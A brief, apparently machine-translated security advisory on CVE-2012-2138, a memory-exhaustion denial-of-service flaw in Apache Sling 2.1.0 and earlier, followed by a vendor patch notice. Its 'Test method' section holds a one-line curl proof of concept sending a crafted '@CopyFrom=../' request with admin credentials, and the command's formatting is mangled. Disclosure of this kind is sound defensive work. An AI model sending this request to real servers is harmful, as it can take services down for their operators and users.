Release date:
Updated on:
Affected Systems:
Apache Group Sling
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54341
Cve id: CVE-2012-2138
Apache Sling is an open-source Web framework on the Java platform. It creates content-oriented applications on the JCR content library.
Apache Sling 2.1.0 and earlier versions have a denial of service vulnerability. Attackers can exploit this vulnerability to exhaust available memory, resulting in DOS.
<* Source: IO Active
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Curl-u admin: pwd-d "http://example.com/content/foo ?. /% 40 CopyFrom = ../"
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://httpd.apache.org/